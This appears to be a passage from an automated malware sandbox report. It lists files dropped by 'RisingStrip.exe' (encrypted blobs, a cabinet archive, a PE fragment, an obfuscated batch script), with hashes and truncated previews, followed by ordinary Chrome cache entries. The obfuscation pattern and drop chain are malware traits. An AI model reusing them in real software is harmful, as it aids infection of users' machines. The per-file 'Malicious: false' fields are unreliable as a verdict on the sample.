:.........{#...r5d...Ehhg..+.....CdV.4F..3..0X@Pd..Q.'E4)........d~..D.........~9.C..........f...Ye...`s.(.....A..O=.h......qSX8......=......gd.Z..5.....22.U3d3.Jm....iwE....tn.~I..76..2s.M....]..J...\v.cr....9.Z.........Puz...\|...V....^..4...\.8o.D-..j.~i./.o3..b.6%..\l4...M..3.....M.!..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Phentermine

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	7.997804207327123
Encrypted:	true
SSDEEP:	1536:kx0KBtnaFyFpN0QEkgXyXDUOrUtKlgLNLSW3JEjdg6HuLANidLuLzkuPYuu:M0KBVzIkgXyXDj/gBWdjdYLAgLu/el
MD5:	AC14C61862A8CB717DAA2C6DB76B9339
SHA1:	AB926567A731BD1EDABB22AA82919D7D991F5656
SHA-256:	703E1F4E10B695E2AF8CC31FA8A58C5ECBEC53120A93660D45EF4E246C929C4B
SHA-512:	CA6E9704A048179383D12E385BD90487BD46E855DDFC90EB9A9C2A2BA22FDAAC286C11DF8464CDBDB11F21CA5F7DCE69AE810DD63F54ED3A6D2A833D003B2F32
Malicious:	false
Preview:	..c.E.o.N.F.I..'n.............7\l..x..........&.....T.e.].Q...r...4j.l`.].g.S..q +A ....m...'f.@..3h .n..$<C..V}3...k.'.....TkX@N.>..+.W....k...r..;..[.8..\e......qA.....x..x.5.8G....4Y.....62.,........Qo:..7{0-u....m:........B./r.g..3.>8&A.O.....:-q..........).lu.....?.2....rM...8..lV.-..tu.c....>.YJ.?@.a....X.a3IX..\..G....d....R.s..7"..Sx...._A.L..Q...{VK..l`9.....n1WT3g@.l...i....?..@..c.v.g!9...0.....MW......gyD.....r..l@.&B..-.....G.&."tU.O.)..f..RDA.6.J...........rl.VBS.IG..^..."..SQ..E.8.+.........MIe...[..Ja...>..^&n.,o...=........~j.,............c...\|.C.I/..`.q...S.......7.L.....YL..,!.....XI..U.....]......u..CWZ.p....+..0.....8.)wT"..U6.8.....5..A.x=O..b...@.T....dSw.r:.S.t..&.AK{.9..p .Aj..BF.t.....Gfbj=PY..E.ul."...Y..i..].....}...X@8...".......0....]A..~4D.....F..<I.Cxp#..-...i,_..{..Pfs.....o......u..C..!....e\|...w>`1.(...x.G...b..B.4b]..+...4....5.R.~.3.(B.....O. ..s.8..LV#.~B...By.Z......5!,.....r:.@..W...x.i ...];\.........H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Shepherd

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	Microsoft Cabinet archive data, 488875 bytes, 10 files, at 0x2c +A "Tell" +A "Bound", ID 6855, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488875
Entropy (8bit):	7.998596719679169
Encrypted:	true
SSDEEP:	12288:95vt/QZkTYg2//pI1Az1FFNjXAdOANadfSVuwRAX:NgyYg2/n1LCdPIpSVuwRy
MD5:	DCE4062B9244B86F065C0C9AFFB4F4D9
SHA1:	457352261A9D0E425E53CCB6470349B182B9997B
SHA-256:	0AD0ECE68586795E81EC8FB741C8921DA0D9313CCFB914EDD281879C0BCB3AA7
SHA-512:	29CDC1F297249B5AB9BF1C2E19422B6BF5CFC26CBEE9C578CCB44D611CABB60B422BD587AB777151E05EA9BDD7EE0517070DC0AA4A3B93565D4F30CDD4826579
Malicious:	false
Preview:	MSCF.....u......,....................................."Z.. .Tell.m;........"Z.. .Bound.....cD...."Z.. .Housing.....c(...."Z.. .Advances..T..c....."Z.. .Hydraulic.....c,...."Z.. .Mountain.. ..c....."Z.. .Certificates..X..c$...."Z.. .Viral.....c\|...."Z.. .Belongs.....c....."Z.. .Am.e%.Sj?..CK..\L..7~.FM.(.I.Br...."...J.t3.!t.R....CHBR.P.!.z..B.BH..9...........Y{...:....k.<r..Z(.....pWQLBd..!.Z[.$..~L._..H..:...pU?.dsU...'X/H..%v..ss......'.......h.....a...h@.H/....+.n....}].i..$..........\/.9'.>-.~..3....J...%..s.E..x[_..sz../..K.H..n...kI..D>..Mr..g..D..R.....s.d.. ..IU..Q@.3d..9E.A.P. ]5.....I...,U.".....&...~.....C.... .w.5."NC...H.\|.)....t.n...-\|....].<.)..N.C<.B...W.N..Vr.>z..b,vw.qE.._e......B.~p_.ci7$1...2.X.:.;.+0....,yVxf..x.rW}b..@.?;..H..;.....................f...'!..x.....r..)........p'xOKp...`R.u_.D.....`.2)..../....}xo..wJU.4.A..X-......K......^\.'....Y.`.D.Gg...gB....R"..P.].e?.1a.%..5..$T.[6.[6',..[6.[6.[..[.E.....KF.[..&.%'Xi.....].[z.".

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Soma

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	data
Category:	dropped
Size (bytes):	99328
Entropy (8bit):	7.998180614298839
Encrypted:	true
SSDEEP:	3072:zMowAepJpAzdmDskBs5osAQ3z2TKkfxkxTuHoG+tBNVHQ:YowHJZsGs57/DAxkx7GK/2
MD5:	60496A091A9EA1BBC094F05E99B97C59
SHA1:	B5F1027B7EF09AD2DE845F41F1176ACA7F6C4A98
SHA-256:	D8CDA13BEDFBE42301518B6FD3BE21CBC5F5F71B1F90E599F10A040C4F2F8187
SHA-512:	8419730CD685AD0A54FD83732D54EEB11A5E61D1954B12AEF3F9D285F81B33E99F5B5254E5228F5599F3C94CBFA86A82BE572C3EFC98B312F54B6FC90BA10296
Malicious:	false
Preview:	{..~.......tF.%).i...C.gi.,\|D."..............@`.v.....mM....C.l..#....iJ...@.....CY..^.B8U..(.<.Z.y(-x..5.^.zOY...3.kY.jz.9fy.......K.e0..N-0.$....a.......! ..NJf^f.J..&z..D..]........'E}..3V8.P~..A1...B....:i...@..n:.B.LH...9.TvH`.4..0.5..1...B.F.......2.....M.O.t.hl$Q....,.z...?...C.P(.d......U......w...{'..../.......s........X......R.n.l...#.....D1.o.7$..hO.......P..6.rk..b..Q..S2...[Cb.R........U.$. ...../..'q.l.X.s...1El..c............-.._O;.',...._@.......X-.g.....ic+.....G..U'u7....h.WR...\|...q..q..r......N.`f..n).'..$D.F..6}.....A..C-n.*...~..r..3..r...`.....T.c....4%....8...Z..,.9.l...\ewA-..L.......Q[xwm..z.....Y..........BZ.`L....+[..V..{..D.\..c.z>..S..&.K.TC]`..&1...V..Md2..l../.B).g..\|..n=..(.Xn'...4..?2....O.b.....u.$c....&V.!~.....F..S...%T{}....E.C.....$....Q.g.6......>E.~..U........L..CZ.+SN.I..;...-.'f.~..!.p..A=.A..q..qHQ..!:k.M]U._S....e4..R$..j...2.....U.r...f..X..-my..&..js..).;m.OU5..v$#..t.W..(.....V.\|cFBN.#.=.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sponsors

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.9976998097451055
Encrypted:	true
SSDEEP:	1536:pTv0/PO2SUZtx83TtiQTE8pOxw14R+JgYHub6H0qo8:pTv0/PWUZD8D0w6EOiub6Hj1
MD5:	656EA190B28A9BAC8AB0D5B187140F9A
SHA1:	6D8EFA18C85AE11DB23A81E8ED90DB81D5A4BCDF
SHA-256:	0747BC669E6478658D3918F2F8B5F923256120D389B2E08D7BE1DA9E557BF025
SHA-512:	EEE8DACBE9F9E811BBF38DA4A63042D94E31C668DFD796F795C65C7E94510F4103365CAD904B907D1588F932DB257C61FB6B5DF7EF475FFAA6FBCA9E7D4AA94A
Malicious:	false
Preview:	.NZ~...p.......}(v......[.....v.....!.B<...[....'r..Nx..k...yqJ......!.^...5.m).@(.y...w.......E..K..m.Ex_5.%.@P0..........WA'.r....lu_..]Fkgk.o.....;...]n....)p<1..d.../{..c2..wv.k.TT\|..o.P....e..M...p............(Q...o."(OM5..+..P.H..p..s.{S.M..2.a}g).t(....}.f..r..RW.....6F.%...M..!.......%..0.......3\..~.f.VyTV..u..;."......}.O.\...8.N.k.../..gu......J._`0\].>.....t.fd.J..q+.L..WY}=Q...>%..U.tws.3...!A...24..(......tv.V..j.r.)Y.....5T...6....zpB.(....g..S#.1...BF<F.......\|.c8C..C....>My)8!~Wd..H....?.U.H.1d@...[6N......L..wpMb.FZL.K.....'..y...<i..!.....MO......2w.MJ.~.c.....oR.7......{zH.............!....v.\|X....!.....\|...C=ig[~O>.....M_....$...#(k9..Q...d.A3..X'..NBP.=..aAg.TK....}Fu'V......P..E.m....(Y...\|7.F....<A9._.9.j..:.....s.L.K..#i.m.h.9C...Fb.@y..9...Xd.a......Z....=.id...e..4.6..t..v.....4.....8...0._N...g...5..TM%s.....UV..0q.._..@x..P..#K..:.$..65.pd.V_d.@...g<qf.....g.@5Z,....]W1Z...Xa.62.T..S'.a...gk...Z.:....S...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tell

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.240969697158824
Encrypted:	false
SSDEEP:	48:d9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJl:PSEA5O5W+MfH5S1CqlVJl
MD5:	DFE652AFBEBBC1B660CDDBCB2B233D7D
SHA1:	FB34587876860A137FE771E48203683D081F1038
SHA-256:	30B29459807E319AB41EA8F3CD5F74AE313CE13B6C47824CC6B624D710E58937
SHA-512:	8FF0DCDC11B6AE0F063E95EA1F5BBF18DA6401253E764AFBF8CC6963D7EEA6E85CB801A0C367C09971925FB3AA797FA5566AB20DC9F6A38D97C86F0182DA11E3
Malicious:	false
Preview:	copyrighted........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Vids

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	ASCII text, with very long lines (482), with CRLF line terminators
Category:	dropped
Size (bytes):	11412
Entropy (8bit):	5.192707043318033
Encrypted:	false
SSDEEP:	192:8G3saNfIAkTthNYaPNCplAN9KHzx5NIClenS/QrR70C99CPVa0p5I:jdIAmhGKNCplAWH7NIGQN70C7Gy
MD5:	906376B121991D311866DC29DCD592F1
SHA1:	6C042814F04CB81D45D7AF80B5725404FF2C2DB1
SHA-256:	AB7910F330D97F36810F3C18C914AA926C7F261602880ABDD112B6027E4F1D8B
SHA-512:	C26DDF67C6796DAB4389CE1F788036A8B05775702904F066ED290C219A774BA8A809DECA272A82DF0458480C99DBE6466073C439C4C19F1E5315772D3CB1F0D7
Malicious:	false
Preview:	Set Register=M..vcVdSpecialist-Source-Significantly-Algorithms-Diagnostic-..hnoCooperation-Sheer-Bears-..aEAGone-Maybe-..gNNipple-Penny-Behalf-Mi-Haven-Unlikely-Consider-Ps-..OEGCouncils-Proceed-Old-Intermediate-Displayed-Refund-Affected-..jyTear-Dark-Uncertainty-Db-..Set Broadcast=i..kVWorcester-Salary-Transparent-Programmers-Presently-Crawford-Necessity-Dos-Immediately-..hbQProposal-Nursing-Rug-Fat-Mail-Lone-Fiscal-..BTevUrge-Nz-Desktop-Sk-Connected-Last-Adjustable-Flux-..PjOSalvation-..RKRBuzz-..OySecretariat-Present-Gnu-Observed-Declined-Dimensional-Anaheim-..hzIConfig-Skilled-Attribute-Usc-Service-Fabrics-..QBHtml-Replacement-Shower-Towers-Sizes-..Set Dramatically=j..XcPosting-Montana-Inspection-Blowjobs-..jNmDynamic-Corrections-Navy-Hormone-Lookup-Cups-Revolution-Skin-..hpmHFloors-Publish-Events-Faq-Eva-Cooling-Wherever-..AXWExplained-Io-Pierre-Boolean-..IagMAsks-..EwfHarvest-Productions-Czech-Test-Another-Technical-..xlIncredible-Dreams-Stated-Platform-Psi-Pci-Know-Bizarre-Thous

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Vids.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (482), with CRLF line terminators
Category:	dropped
Size (bytes):	11412
Entropy (8bit):	5.192707043318033
Encrypted:	false
SSDEEP:	192:8G3saNfIAkTthNYaPNCplAN9KHzx5NIClenS/QrR70C99CPVa0p5I:jdIAmhGKNCplAWH7NIGQN70C7Gy
MD5:	906376B121991D311866DC29DCD592F1
SHA1:	6C042814F04CB81D45D7AF80B5725404FF2C2DB1
SHA-256:	AB7910F330D97F36810F3C18C914AA926C7F261602880ABDD112B6027E4F1D8B
SHA-512:	C26DDF67C6796DAB4389CE1F788036A8B05775702904F066ED290C219A774BA8A809DECA272A82DF0458480C99DBE6466073C439C4C19F1E5315772D3CB1F0D7
Malicious:	false
Preview:	Set Register=M..vcVdSpecialist-Source-Significantly-Algorithms-Diagnostic-..hnoCooperation-Sheer-Bears-..aEAGone-Maybe-..gNNipple-Penny-Behalf-Mi-Haven-Unlikely-Consider-Ps-..OEGCouncils-Proceed-Old-Intermediate-Displayed-Refund-Affected-..jyTear-Dark-Uncertainty-Db-..Set Broadcast=i..kVWorcester-Salary-Transparent-Programmers-Presently-Crawford-Necessity-Dos-Immediately-..hbQProposal-Nursing-Rug-Fat-Mail-Lone-Fiscal-..BTevUrge-Nz-Desktop-Sk-Connected-Last-Adjustable-Flux-..PjOSalvation-..RKRBuzz-..OySecretariat-Present-Gnu-Observed-Declined-Dimensional-Anaheim-..hzIConfig-Skilled-Attribute-Usc-Service-Fabrics-..QBHtml-Replacement-Shower-Towers-Sizes-..Set Dramatically=j..XcPosting-Montana-Inspection-Blowjobs-..jNmDynamic-Corrections-Navy-Hormone-Lookup-Cups-Revolution-Skin-..hpmHFloors-Publish-Events-Faq-Eva-Cooling-Wherever-..AXWExplained-Io-Pierre-Boolean-..IagMAsks-..EwfHarvest-Productions-Czech-Test-Another-Technical-..xlIncredible-Dreams-Stated-Platform-Psi-Pci-Know-Bizarre-Thous

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Viral

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	6.18194167892197
Encrypted:	false
SSDEEP:	1536:35el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiQ:35elDWy4ZNoGmROL7F1GB
MD5:	AAF850524BEBFA693F2023B4A1E5BC22
SHA1:	99131FFC63B4035883BC0682510D66B705D71981
SHA-256:	54B6CF9B5AD0E86C1AF5E98BEF8ECA355423B7FB5FB66298758DF0305069105B
SHA-512:	44CFF7143D602A8ED43F2027D9896C5E73448E167A1D4829749FDE30B6E60E6BE0660A5A1137CC3EC44F3D9F717BEDC6F2FCBB80CB2AEBB5ADDDB53C415E79D3
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (848)
Category:	downloaded
Size (bytes):	853
Entropy (8bit):	5.171606676312205
Encrypted:	false
SSDEEP:	24:ZCoJb4H2vJNBBHslgT9lCuABATruoB7HHHHHHHYqmffffffo:pSGKlgZ01BAXuSEqmffffffo
MD5:	50E046672190E1542E0E6FF3F1FB4201
SHA1:	5C343EE8C3EE333AA81715A90CDDBB6B4B8C70F8
SHA-256:	268379EF528982C0886C4D8EC5C56C698B4050AD6A7A4C415AD4A1725B668CCB
SHA-512:	25A85FAC65CA69DF044DA268B40B0803815E293AE71CC2C95B2C6F98E80F93776AF19E912D6F09269BA30FA35A8DD72A4B2820B497FC4A16A7A4DE5728A527A9
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["golden state warriors philadelphia 76ers","thuraya 4 spacex launch cape canaveral","south korea flight reddit","wicked musical movie streaming","fog chemical smell","sony playstation","georgia players missing sugar bowl","quadrantids meteor showers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":510657626442563566,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	downloaded
Size (bytes):	117446
Entropy (8bit):	5.490775275046353
Encrypted:	false
SSDEEP:	3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
MD5:	942EA4F96889BAE7D3C59C0724AB2208
SHA1:	033DDF473319500621D8EBB6961C4278E27222A7
SHA-256:	F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
SHA-512:	C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132723
Entropy (8bit):	5.436604534641905
Encrypted:	false
SSDEEP:	3072:fFkJQ7O4N5dTm+syHEt4W3XdQ4Q6ruSr/nUW2i6o:fUQ7HTt/sHdQ4Q6rDfUW8o
MD5:	600D5DABC500B248E4F90EFAA37014DC
SHA1:	68B8AA1F820CF4DC473233AAE0940CE43DF09EB6
SHA-256:	11B0C6DA986C6E431BE99C83B3F1B693AFAE8DA6B668A00875C148BF7B627127
SHA-512:	96A2A4839FF2EB177A2705EC87CDD398E307D44190D170C6E606452606F2131BE798C9DD1CB1612A6433EC32D21F8F1750D396F3B14D98CFCF39E85D90320799
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2410)
Category:	downloaded
Size (bytes):	175897
Entropy (8bit):	5.549876394125764
Encrypted:	false
SSDEEP:	3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
MD5:	2368B9A3E1E7C13C00884BE7FA1F0DFC
SHA1:	8F88AD448B22177E2BDA0484648C23CA1D2AA09E
SHA-256:	577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
SHA-512:	105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi\|\|(_.Yi=new Zi)).set(a,b);(_.$i\|\|(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a\|2:a&-3;return(a\|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a\|1};_.hj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.ij=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 